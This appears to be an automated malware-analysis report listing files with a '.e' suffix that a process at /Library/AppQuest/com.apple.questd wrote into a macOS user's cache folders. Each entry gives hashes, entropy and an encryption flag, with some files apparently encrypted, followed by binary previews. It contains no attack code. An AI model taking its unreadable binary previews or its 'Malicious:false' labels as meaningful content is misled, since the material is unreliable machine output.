                                                                                                    SHA-512:EC5FCF2342BBDBB2DF26265B36360D0CD59595BCE450F390CAF0B6A3B86E950970082216E0C0A16F07B64D72D83D514C913D3B42C9E4DA1EF4D9A79A7C24749A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i.......!..Y.O..c.@...h.../=.x..O...>.k....L.B. i.......!..Y.O..c.@.....a.B..x..O...........|...8@.N.9.o..h$..................(%..z7Kp..x.*X..R.Y...9...d............................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.textinput.KeyboardServices/com.apple.keyboardservicesd/2bb72ec7676f1ef6f5f88fa889a77a9f1443a05d/Records/.pcs.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33324
                                                                                                    Entropy (8bit):3.5958677743312877
                                                                                                    Encrypted:false
                                                                                                    MD5:AA909296D65B9207F89F96F0D4223BD6
                                                                                                    SHA1:6FBB09EF9B15ABB3BFF4B4DC24CF38F208D68D9D
                                                                                                    SHA-256:548D2E381D6D8EEEF7571744602B88A1BCC87D2AEAFD2F2162E8F8DC9277F876
                                                                                                    SHA-512:B9F860D678D6245C7E1AA21AEAA825B51DFF2239B2597F417178452D6D7B37261674B9A25F4C458E2D595A9A9A52187A70CA2C9B53CD95EACA7B7948D2D1063E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$.....h.../=-.0l....t...7.....h.../=.aN...@..#.1rS..a....lT........t....)..V........u..!.....`...=P*.<w..F.7t...7.........................]!;.......)K.Y.F..V...J!...................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.textinput.KeyboardServices/com.apple.keyboardservicesd/2bb72ec7676f1ef6f5f88fa889a77a9f1443a05d/Records/.pcs.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.7599978825742686
                                                                                                    Encrypted:false
                                                                                                    MD5:320153DB9992DCC1E9189958BF57D9A7
                                                                                                    SHA1:F26D0AECDCD2CE5793C26B8C8D819DCE952FB181
                                                                                                    SHA-256:52F9160B897EAC5FBEBC6F4EDCDFF2A01317E4D3EBEBE866EF17E9286C66C2D3
                                                                                                    SHA-512:4182467AA8978F542104336020D8BB710276601D3A142A4423F68934E091FFF200260CBC629A40ECC0149CF77B07A0FD2BA8919FCFFFCD0CC45BDBA14426E579
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tp.v...})................{...#Rox........t...7............L.D<.+.%R4,....,,.<.~....%....+.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.DetailedLandCoverPavedArea-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10306
                                                                                                    Entropy (8bit):7.957702940486103
                                                                                                    Encrypted:false
                                                                                                    MD5:98D7BE591FA19C08EF027258651CAEBB
                                                                                                    SHA1:7A92B60F8468AF58126EFFCDF097F6B2031BF806
                                                                                                    SHA-256:AE80C0BC07F6A1FF1387E31013B1FF88D3433B5877E5FBB8C848F943BD670BE7
                                                                                                    SHA-512:21B5239B86567EB429DC154F29A46CE0235F3ECC5FD6F57769334F0FDA6A178F8CE1411C50B868A487CAEB97C27B976B4F315783C78DA51C180CB0A1BB5A0644
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o....F..d."..h..1...8...:.>....C.....oq8_.........'a%A.....T.w..q..J..2....J+2.YS..D28...:&.{t?P..&.@......c...s=D.2>..&....t!.^r......iJ...`.c;..q.%...'v...ZK......*$...F.B.......7O..;....p..$.T'.a......|...3h.W .{nL.G..,....a.u..D.7..d.....#....z.ht4*.........6....A.L..".6fY.........p...d...R.A.....%..1...oL..T.................V..T|..3..o.0..<.Xe.N..uB.......~...d....P.BT.r.y..D.@%.HK...>n..o..A......T.2.=sg..._.......l!,..H.-...M.r......`T...!$.....K...f.*mA.$..(/.?..wL...0......*.k.Gw...y....IF..7...[...#.C........*o.;...&.}#...MY..M...kWL....k..Q....2U6....2./.!.l..d.|]..8...r.F..Z.-^.bX\.....-(....r.....hhh.i...^.....hI2.?...ud.H.>....1.......I.'....Pzan.n.7.j.2.....'g..n....n..7.JV..o....I.7G.n.Yxz-i../..).......Up.m{...$.o7..~G..rfF.R`.L.3R....j(.l..u......./.U...IAX.....T.....C.L..xi......h.J,......}.".[C..1V...i.U....9.....I\P..E...~>..=...f..]..q4Xo.LL..zA....2~#H...J.>.W.t..sr.....K.gE^..!*...1....38..q........6..#...<S.._J..q!..p..?.Q.....[. 0...,P..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.DetailedLandCoverPavedArea-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):73238
                                                                                                    Entropy (8bit):7.996815398011803
                                                                                                    Encrypted:true
                                                                                                    MD5:E1A4524B274072139524904AAE711ABB
                                                                                                    SHA1:7A30E305DE6DEE4BD69C44147639C4F1AACBC6D4
                                                                                                    SHA-256:E1519E44A5F956AE25648FF40339F12B7DE8CCD510C01CAC4F2360E13664A7AF
                                                                                                    SHA-512:D982096C92E4F22BDDE6825A04E2E87E689AA8F705A7F65999F72664879605D0DD5A3E62F9BF9BF7216C9F02C63E14031861D823022AB28DCBA90646A1149767
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..wd....Z!..<...Isy.aH...f....Z=.:.iM..V..H.....e$....4Z.Ii]. -....F.d......J.e...T.(.. [A=..1..G.lWJF.d.6....Gg$..v....L-k....Cw(.B.V"Lb5...W.jfy.....e....&....j..029.....-......n.=9\.]UR8..R&[...F..vh....5}..=...R.......egZ..Ls.Ne.[..q[.u!........f.....y.+x(;{.2E.9..w^.^'.|..X.BN..~g..........#.T.[.y..C.}....."w;..):..cSmI.~_..H..........D./W:.y.C.x.............3....j..L.....X...../%u.6f........N1......yEa.L3..#.VT.....,6La....a}.X...rP.H.1xR./......MT...A..6..D.&......wLx`6.oAkH..|.-.hH.S..,..A..S.{.{t...L 5.R..D|....(..F&.j..U...v.'=......-.L9f.==U.......0&N..)L..*E.....lT./..K.a..$.....H.\;X.(;5.a.......56....&:.u.d.........s.Co.6H.e..f.`...5G...4......=!......xT.s..r....b.....[q.p3./".oM6OR......a.7.7;..AH;._..L......*......p.........`.A.h...........<.........@.......5...p..C....5{.."...#...Ld.#........n...2..*..XV`.y.\_.?...4.....b23^..........:D.:..>.#.V+..7.O.(.....0o.&..[e._|...SBAa....{F....`..>..<.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient1-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10378
                                                                                                    Entropy (8bit):7.960008546987869
                                                                                                    Encrypted:false
                                                                                                    MD5:1F1C9E24EB479F221F3C6FEB81158DDD
                                                                                                    SHA1:B2BA575A22EC52DE8D283D31D7DBABE6F01FDE9E
                                                                                                    SHA-256:9B4E8544772AFB85BA4C3B83BE789C34CBCC6ABB0A4F767EC3101AB7B4F7F3A7
                                                                                                    SHA-512:9BD53A3080A8C880C228EC92CEAEBBA54AEAE2757AFC98665B77C5AEE26E6452BE42155F85D3ABA43F262FA3406072A9758DAB593778D5855B477EA7DD0B309F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o....F..d."..h..1...8...:.>....C.....oq8_.cz..2...c.~^.3\.s]...... ...[.-".J@....$.^Sv...JO...t....+...8MS.i.I....hWA.........2...s..F......Q....p....b.8.q.....%...X#..,^..a.d....!.>@.H..L/...~L...... ...*....<Sg.L.:........C}...>...q.!y.m./.M".y..!{...U...O..(.H.j...h725-.]...3M .jq.~........e...<.........c..R.O^................84%....B..l......;...3..Ew...X..l.../N...).*!.4...-<b=....._.o... ._`..O......U....l...N.*.A..l..OER.)..{..h..1...v6.C..`6..R.o......0...Z~.1....^.H.F...#.L...6._m.^"7..z....<."r.".~b.].."ce.._.?q.fhjM...w.#.E?....b.Pc.E.,..ZdN.0.4.......\Lo.k...^....fA(..~.p...........l..........Z\...,>.R;.$.".~.z.1Fv.0.vJy......_.!...A.2.m.x..&...<..( p.N.O>.QT.'. .g.pH_c...R0....j...`..:S|...D..vX..R.!.;.....{..4.......G......F.....!...v.rx...c..D[~?...4..X.19.3.i.....-....F7.\..*#Pa......17%....\%Q..[/\^:.....|....N.i/..C..U.M...(*..(...%.h.......M.L^.y...Q..0.V.&.<>.....2.....Iv&OEE........q..n...7...:.".6A..].t..R;.....A.k[.......BA...H>h..Y.~6...I.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient1-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):67422
                                                                                                    Entropy (8bit):7.996482363397391
                                                                                                    Encrypted:true
                                                                                                    MD5:C128CE10E23A36FF20ACB3D52268A15B
                                                                                                    SHA1:1A77F5421A4A44A61658BEE30B73BC818C72605C
                                                                                                    SHA-256:03C15E49621AE43EB705CBC55BF944AAA34CC278B83DA6E64890E4FB5A688DC7
                                                                                                    SHA-512:BD5E7069208435BB9325EF5AA070F8DA997287B0CA24726360A571CC8C3520F03F9EAC3213525C9AE7113FE0FF7699406F4FDF8E63E08590FF713F80F1EF1255
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w...MeU......+Wd..!...N..\...Y...~.!\.qg7..?.]yw...g.9...%:.B.......x..@.......r...[...le(79..Z..X...fW.{mS.@<.nC..G.8|..*.un.58...;e.d....av.........Ds.3..#.%...w.".)GR....6?..X.Y..W+.dc..jL_r.Q...;........"Q`.....F.0.1S......Z.8....]X(.2&.D.d~.G.=._H@b....b[FH*g.hd.*^...K.4.o.(.8.j.F.xg..M&V=e......]*......:..U..Se..b.N(.3....3}Osx .....B.y.:pe..9`.....g..\.1??.Kp=....IP..1.P.....[_..k!d..U.......t.8..f.PX..}.3K.."n......9;..\.D2........}C`..h..].x..N.)6..<.^~.l...X|L7...Q.%......9..9Y.o.[..h....vD.0O.K.&6..w.......B/...s....8.....~E.......b{B59/..*<.>....1.\E.........?.&....F....@....!}..3p...s.......k....X......(N...\V.?.4P.e.>..$"...}...b.FP...R...u.&&2......`.l"...Y )\N<W.D.m7......gK..TE.xi...!.../.....I..E..Lr|!..=..;.;.b...H%.....:...R.:'..q`6....9...W..)....p.!...]<..@.?j-.......P.W....fo....|..3.E3Xj.TQ.\.;...uq.......)...6...._t.&...B2..ZR{s.,N..u...g.K...._.!..S.D...%.>p.....`..C5.D.....A.$.v0..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient16-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10378
                                                                                                    Entropy (8bit):7.959774485538942
                                                                                                    Encrypted:false
                                                                                                    MD5:A348A52217D7EDB8F8C52E3286AF26E2
                                                                                                    SHA1:F71FB3462E989BFC3ACCEEC7E4D7B1E6066A4B68
                                                                                                    SHA-256:DA1F1505C76276FB072A8B512419585E4E5739C6DD88F624BCF73B2ECA02181B
                                                                                                    SHA-512:367C23999215B385D1121CC495AD9DB70BDD22BAB707EFFFFE179FAF81FBEB2C30731FF10B7FCF767FD5B7A149463037C3A90E198A5A6860B2D664B6889AFD45
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o....F..d."..h..1...8...:.>....C.....oq8_.cz..2...c.~^.3\.s]...... ...[.-".J@....$.^Sv...JO...t....+...8MS.i.I....hWA.........2...s..F......Q....p....b.8.q.....%...X#..,^..a.d....!.>@.H..L/...~L...... ...*....<Sg.L.:........C}...>...q.!y.m./.M".y..!{...U...O..(.H.j...h725-.]...3M .jq.~........e...<.........c..R.O^................84%....B..l......;...3..Ew...X..l.../N...).*!.4...-<b=....._.o... ._`..O......U....l...N.*.A..l..OER.)..{..h..1...v6.C..`6..R.o......0...Z~.1....^.H.F...#.L...6._m.^"7..z....<."r.".~b.].."ce.._.?q.fhjM...w.#.E?....b.Pc.E.,..ZdN.0.4.......\Lo.k...^....fA(..~.p...........l..........Z\...,>.R;.$.".~.z.1Fv.0.vJy......_.!...A.2.m.x..&...<..( p.N.O>.QT.'. .g.pH_c...R0....j...`..:S|...D..vX..R.!.;.....{..4.......G......F.....!...v.rx...c..D[~?...4..X.19.3.i.....-....F7.\..*#Pa......17%....\%Q..[/\^:.....|....N.i/..C..U.M...(*..(...%.h.......M.L^.y...Q..0.V.&.<>.....2.....Iv&OEE........q..n...7...:.".6A..].t..R;.....A.k[.......BA...H>h..Y.~6...I.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient16-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):67422
                                                                                                    Entropy (8bit):7.996473761335695
                                                                                                    Encrypted:true
                                                                                                    MD5:48E839DCABD4947E9C69D18839249ED0
                                                                                                    SHA1:1E747F64E426F2268BDA377020B1DCB833941A8C
                                                                                                    SHA-256:70D53F2722F7C8DF623CB2F90DDD5FCEAC3282ED06E12CE04736330D9E05D8B4
                                                                                                    SHA-512:9341DE6032D5F9FD9D7175DE5FC081DB944A76307B6A69CE792014259878882EAA4F49D392C4F8B8B81555F8568BFEE701C94C7602CAF551446723A07195D8B2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w...MeU......+Wd..!...N..\...Y...~.!\.qg7..?.]yw...g.9...%:.B.......x..@.......r...[...le(79..Z..X...fW.{mS.@<.nC..G.8|..*.un.58...;e.d....av.........Ds.3..#.%...w.".)GR....6?..X.Y..W+.dc..jL_r.Q...;........"Q`.....F.0.1S......Z.8....]X(.2&.D.d~.G.=._H@b....b[FH*g.hd.*^...K.4.o.(.8.j.F.xg..M&V=e......]*......:..U..Se..b.N(.3....3}Osx .....B.y.:pe..9`.....g..\.1??.Kp=....IP..1.P.....[_..k!d..U.......t.8..f.PX..}.3K.."n......9;..\.D2........}C`..h..].x..N.)6..<.^~.l...X|L7...Q.%......9..9Y.o.[..h....vD.0O.K.&6..w.......B/...s....8.....~E.......b{B59/..*<.>....1.\E.........?.&....F....@....!}..3p...s.......k....X......(N...\V.?.4P.e.>..$"...}...b.FP...R...u.&&2......`.l"...Y )\N<W.D.m7......gK..TE.xi...!.../.....I..E..Lr|!..=..;.;.b...H%.....:...R.:'..q`6....9...W..)....p.!...]<..@.?j-.......P.W....fo....|..3.E3Xj.TQ.\.;...uq.......)...6...._t.&...B2..ZR{s.,N..u...g.K...._.!..S.D...%.>p.....`..C5.D.....A.$.v0..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient8-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10786
                                                                                                    Entropy (8bit):7.967338341684255
                                                                                                    Encrypted:false
                                                                                                    MD5:72DD5933923E0AB1CEEF1BCF86CAAC2D
                                                                                                    SHA1:AEC20D487160CFC36224E77E566DA8AE493A6D04
                                                                                                    SHA-256:7E50CD001E5B2E69A2974E6590B90BCAF80B22DEAF9595FA18B4255A1B949A62
                                                                                                    SHA-512:422EF0A1132FC93E528E6A0C617D8738B2D9B88079E1ABCC29877BE60490C0D75C7AEF4F7D77B2AC9BFA5A1773B104DB4C48D46550A447FFB351B6E0CAF101B8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o....F..d."..h..1...8...:.>....C.....oq8_..?4%)..Z.>."E.e...}..Y..=........p?.2?U..J.. ...b.ET.yL..b....!.....dE.N.P0...3`P.....t/..L...v..\...............l1R....7...*\......]..).....%n.q..7Yb.....V6.$F.......ZX..Z.....b).K. .P!3...N.~...K7n..._...YE<.|.....X..w.bk....=f..mk!..!~.V.fH<.B..ke...J.$...I..~ed.z..p......f...e...w}..T,.;z....m...Q....G$.U8..o..}l....0.O...g..JA..g.a...s..e+.T.1....x..z.....J.r?........'.u..Bk...c...D..:..._..P+V...U.^F.3D..._V......}....S3W...G.y..........3:.;.....^..x...a..I.z..PvP.....X..6Ezn.k.(.\ix.X..z.........`.l:..M....................,..;...]L..h,S..R.WU..]..N..D.1".....R..?..Hxf",.,.N.T....#..7.u{...>.V..7..wl...W.I.Fk........0.0...C.'.Q....[B...\|...ql)..?.V.S.A.p.J..q..b..gH.H..j~<..e......Q.0..|..H.....Z.H....[..r...J......P..*W....3.p..l.......&.........|.}....A..L..UZ%l.dE..c...Z!.....J....l.....`..Wh{#m.....PG.....K...P!(83......}X..n...?;..=*..w....k<.ELw.4...3.z........'.$..n.........x....1[..u......."..@4...w..(%.G+t
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient8-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):71102
                                                                                                    Entropy (8bit):7.9968723857887465
                                                                                                    Encrypted:true
                                                                                                    MD5:5475A9F61B1F2749D899D7F6007E6709
                                                                                                    SHA1:056CC399BF118EC2EE81B47E3E7C8E95C7E8AFA5
                                                                                                    SHA-256:D07CBB5124795EAA01D47B30F10B7E795AC57F9C14772CFC27CEF9A015F71136
                                                                                                    SHA-512:A8D578F18783166EBC7AA903EBB2937888E9C05B3107542A2F20AE70C0D959F7C7C4502FB4E0647F61F6886153C3149EA9C137BFC4501F5242A9C9E4C88030B1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w.S-F~..."%..F.|S...8wPz.\.."....w...R.?........e..rJ.?.hg..".{..T..W.=..QX..t........6..XW.....o...z.0/.=....0.0.|.n...1XH7)...I.#..@....wSutw.......d.P.Mc...)*....$Y.R..Z.....]_z7.b"x*...&7....@.5\...L..Mi/.Vg.)=W.;........P.)>^......U.z.."..7...%:.....`.3......<..\j.._H.p.dd%..a..`....+..[/..:.....w22..h...q....ha.P....L...O.5.T.-O3E..z.H?;<Z.Y...b....|G.3.......oI\>.qkHr7..........\/=X#-...:....Z(.....X.{6...%.........@p..=....%#.t.].*l.........$O....D%.X......-:...........O..W.*....~F....Q...z.R._ ....4...)..HF.....$.....h=...v:(...a.!...0...8......wx.l.......:>..x..v.W..T..7.D.J.A.....;+........n.&...g`...'....v...'..X>..Y.Y.......|.....m.l.*.LcR...8..{Vp....|..S..P......n.(..?Zt........o9..f...Ty..29..X.!a..3V\g..kN.9?.r..".^.DGg,..{e....u..+...'.1%.......wo.0r...~.......$+.q.r..B../.....I.#S.c...v.......a.M..'...F..0G....._..)%3.........@.@.S....Y.....]7.8(6.{..L..@V..b..Z.cw8......r.y.....X..d.- ...
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient9-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9818
                                                                                                    Entropy (8bit):7.959587824659773
                                                                                                    Encrypted:false
                                                                                                    MD5:A35354E380D484D853AFB38835DEF5EE
                                                                                                    SHA1:19718FE3BB811104AAF1B3BA66B362B342C3F1F1
                                                                                                    SHA-256:0378DBEC7424058FEEF7FB99EBF3F2CEAAD72C42E3EDB2603564791EC32416A5
                                                                                                    SHA-512:405085516A2DEE6A3574DD781D47851A40C961C1C55C67B733CD1026169003A45006A8E70BCA94B43A6B58E0E668F1F53C8E4094D66F4004ADC3B7189F57F21C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o....F..d."..h..1...8...:.>....C.....oq8_...b.nW.a......../..........1l...@.R...~)....0Q.<...4..........f:.... ~.G...RQb.........GfQ.F.P.....t:.f+....0.......z.)...d>_.>..i.}v-'.......w....R.....^+...f..F....h....iX...^A.ni....5.V. gsO3:.u........X..I..#.N.G.WbF$.....=..Fd..W...4..)g......1....r[s.......=I.#r...O $............fZ/......m}G8UF}.......)...= ....^.......:..8o3.d.e....)3A.d...r...\.<....J.....C.!....<..:.p.M....*:6.....@;K......./..P...Bs).@e.).FTEJHv,....9...x......|.K..1.c";.i....T..VC......r&BW..rfP.`....u....e..\z..8.CCR)Vs.G.|.^......Q~...":-.B/.I.)._..Nx..\t.E....Y..{......L=..!46E.r...{.\.......]....'.>...c..vXI..........`cX..L/(.N..M....W.];.i....{#...?......x...).f..".......%..,DU..4.'....R.N. (8....Q;.qC.....|1......O.Wt.....B..H.....]....".......@.N...]\9.S..6@.h.Hk.w..z..S1t.6.....JA.|..7.3..L`VAK.[W9.......,A..u..$G.Oa..P.b.w........0J\...+.k..G'.=*r..O..Br...c&.E...!..m.... ..0........&f..@.....O7.".>@[?....V.TO&.eTd.......F8]O<%...^<. S
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient9-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):62301
                                                                                                    Entropy (8bit):7.996316012993401
                                                                                                    Encrypted:true
                                                                                                    MD5:7E78818882E495B4FC82E0BA96348206
                                                                                                    SHA1:ABF8D6361417937EFEC6ED354C2DCACA5EC3CA33
                                                                                                    SHA-256:775CE4B3B325F4371EF33D79321BA57C62ECB1A6D6C2171F4776D3166D32CA71
                                                                                                    SHA-512:A5CB23AD1699321207A50178DE1C9EEDCD17ACCBF9E155B77021F4563D425701A28BF4950BA953D90520D9DAD8A132D676E2792B95F94D20B3BD3F1532BA87F1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w..."&$..2.-X.HiU[g.q.;.@u. .p.0M.X.3...F.2..*&.m.3K.....G..xd..!....;.......rF~......:".....p.{...'......hn.\y....t..>bk....F..........6Q_....IO\..G.r..~.{..H..X..u[..HHfj....?Y....&..G-.:.t.+R..22nOt..c...d.."..A.o.oY3...6.ne..Z...{...$q...|....S$N.....XQ.z.]...1.k._....Y......S.{...$.Z.#....W.z.....O.O1.^tC..}.......F.....Pp........w\..l9b^..._.S..P.7..drr......dk..%@.3s.............{O...4.....[.'.a...T...s..v...`r\2..,+./....D.5..I...E.k.....U9...d....M...L..!.....7...Bfj.G..<]...'5.RSmGlW.......B.&..J.0l.R....%.P..z<:.....bs.....u.........l-.W.......xvk........)..f.|Y%..RFj...8..D...??{..Q.w.)o.5..oRj.}....b.......m...J-...*O.2.F...T...p.....D)..`/.B*....W.^J.".].}}e3w....y] .f.J..Awd.....C..&<.sS..&......).?.;.!#..SW.|.....O.&C.;.o.>.S.H..n....\}...3...aR~^*.....].....T.9.J&....MX.....W.v.+..Q.g.Go....#...<#.(.....^p0..XI3,....P.u..?c.;.A.a.P!.Nt.p..b.:......ysQ$..W@.....o.5..oxy...+....Nh."..v. .`_JB.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.RealisticRoadHighway-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):13938
                                                                                                    Entropy (8bit):7.974984967210002
                                                                                                    Encrypted:false
                                                                                                    MD5:F592FDCC09BDE5A64E019FFAE75B76B0
                                                                                                    SHA1:BF14376D4E952D3E0968D1F3EFFFF518061A4FC7
                                                                                                    SHA-256:2A3240C737C057D5E58CFF7E09E274FF4B212F165D0DCB78EF54C059A251A4E7
                                                                                                    SHA-512:E8D9F17491C9B5AF2086BA0F3C8948C890F4FB75E7F363CEE65DE76D81EA77473A84288E13593007996CB842FA9F18ACFABFC52F66FCF23DF7546E5D152C0B99
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o....F..d."..h..1...8...:.>....C.....oq8_A..L.Hv..}..;..c......U..F,V*.S..h.^.-W........^..6I...El..a..J,b(.5..N..n....G.....P>.!q...>.......m[............<..l#..g.....hN..F......HAf.X...m..Y.7....^.s;.-...&...D.xa.....:.....rjr.zf[..g....S.$..W.&.....j..k.p&:.y...rV..e.3.^.UW........yI..Ff..oE...^..1.E.g0,..D.4..\...S.E....).1P.'b..A....W.T?...R..0M....X,..c.#N..."}H.2.Q5A].Y.,..B...3.B....9.f...>.....$..0.....C#p.....5.zO.........F.=..J..........s.7. ...h@.<.c...........Q.=.{......$..C.e..4....d\...A.c.:iMH..+6..o.. ..u}...z....j.......EgK@2..@..ME.$N..x<)........".-.......X.....'m..;.m,ee1rC.4.......P.5Y.~..kC+...1..".]y|....\..|og ....<..e.rh....jT..Q.......0....Y>.x..p.=...~a...4i.SO.......&..#Z..VX....k.c.y.'.!.$..U3T..|\V..l.8a.1aW[T..D.w.h.(.(..(.6...go>...n`.q..q...`.A0.U^x./h....J.kXph..d...QK6.........#....05.A.JJT.O.6..1n`.......x.....+.....%.A.\C.)..Z........$.a.r.m9..X.*...Eoc?..i....c...H.^...P. ..G.,s...?._.........E....(.Dq[2.r....N....(...^...f.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.RealisticRoadHighway-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):131289
                                                                                                    Entropy (8bit):7.998151269222446
                                                                                                    Encrypted:true
                                                                                                    MD5:35C20048F09AD12CC779C3157FA832B9
                                                                                                    SHA1:1A9D99D7F27C291E506CB6260941D43332F22ED3
                                                                                                    SHA-256:650B7B8AE9683A3D1255B1CD78D400EA2046C44B1209E30A359F649DA650A416
                                                                                                    SHA-512:2FDC565F0D96EAEED64B0D90A1DE7E7A713173A3ED53B83DB79331795DF65BCB55A8AA96A1AF6247486BF3706129F05DA749DC9B50C1B736B93F71B99EFED763
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w...c.a.....M.d.).(A3.m..cKx.Az.........7.8g.z."........5. ?A..~&.).Rh.............P.!#L,.......O...^8._n.>.>....5...y"...lS.(....Ff..G.....nx.(.,.u...,.p.........&..nG"..y.yn...|..X...M.J~is.=F.../^5+.k..$.H..B2.S.+.......s/E8....){-.....r.@ROVY..xa.Q.k..3..0.}.Y$.v.&.......Vl.b~EQ.P.v.H..J.cXc6KOe..}..B..........*......YF.../.h.%.ekn"h'.?...K..9......\..F.....Fz<m)..9...wQ.C.U..u...%WR..l.].'..M......*....~....x.c~!.....Q.]9.8.....}..'..c.....P....Ips.......N{..P.xft..P..../=wc....6..hqm...L.Yt.a..39...R...V. ..r..[.=......@.3..s...?8/..L......*...v...>~.d..Q.....jH....).....]..G...,.-.l.......).........d...\X...[.l.......*..[Z..42e.\..u\H`S..>..H..6......>...<....u..M.P..u..=.M..,.....(b....K*..._.........&.....G..(..3..b....j.S..1~y.6Y.,...tk0...W.....9..y..a.L...r.>).n.....SB....d.....-...f,.~.8..B.....e.0..},.E.4:@.%.Ai...t...WI.......<..M@$..Kp...;..._..7jC.zH.Wb.C..(..].h....b..,q.1?.........!7.....H
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.RealisticRoadLocalRoad-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):26643
                                                                                                    Entropy (8bit):7.988925826129435
                                                                                                    Encrypted:false
                                                                                                    MD5:A4AB321A7ABBD7F46F1566BC2E3BFFE6
                                                                                                    SHA1:E3F6A39AE4DC55EC3A167568BF95444C89AF150D
                                                                                                    SHA-256:97E7A6CDAFC1C21FE23B023DA359F4CA842387791A2039A0C9A23DD458898DEF
                                                                                                    SHA-512:D120F06D7A83B1D251F40A06B1CB1EE7CAC25C64C1738C36FDDE752EB08CEBBF1563F7D027E2AB9B56B8EFE0A16CEE5B55D051396ADE86D730F3C29D110B9F50
                                                                                                    Malicious:false
                                                                                                    Reputation:low
